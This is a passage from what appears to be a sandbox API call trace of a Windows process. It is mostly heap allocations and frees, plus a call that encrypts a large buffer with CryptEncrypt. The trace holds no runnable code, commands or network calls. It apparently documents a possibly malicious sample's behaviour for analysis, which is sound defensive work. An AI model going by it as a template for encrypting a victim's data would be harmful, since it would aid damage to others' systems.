lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0182.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0182.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0182.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0182.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0182.925] CharLowerBuffW (in: lpsz="byte[802920]", cchLength=0xc | out: lpsz="byte[802920]") returned 0xc [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0182.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0183.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0183.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0183.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0183.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0183.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0183.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0183.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0183.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0183.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0183.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0183.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0183.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0183.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0183.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0183.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0183.001] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0183.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0183.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0183.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0183.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0183.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0183.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0183.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0183.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0183.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0183.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x11ae020 | out: hHeap=0x970000) returned 1 [0183.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0183.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0183.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0183.011] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0183.021] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0183.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0183.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50bf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0183.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54490 [0183.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0183.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0183.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0183.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0183.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0183.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0183.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0183.022] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10cf020*, pdwDataLen=0x8cef60*=0xc4066, dwBufLen=0xc4068 | out: pbData=0x10cf020*, pdwDataLen=0x8cef60*=0xc4068) returned 1 [0183.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0183.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0183.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0183.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0183.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0183.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0183.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0183.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0183.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0183.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0183.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0183.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0183.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0183.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0183.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0183.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0183.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0183.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0183.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0183.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0183.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0183.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0183.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0183.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0183.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0183.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0183.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0183.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0183.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0183.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0183.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0183.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0183.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0183.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0183.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0183.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0183.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0183.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0183.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0183.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0183.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0183.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0183.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0183.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0183.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0183.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0183.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0183.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0183.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0183.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0183.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0183.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0183.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0183.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0183.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0183.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0183.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0183.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0183.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0183.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0183.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0183.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0183.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0183.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0183.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0183.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0183.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0183.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0183.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0183.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0183.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0183.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0183.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0183.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0183.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0183.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0183.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0183.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0183.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0183.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0183.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0183.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0183.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0183.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0183.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0x11a3020 [0183.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0183.235] HeapFree 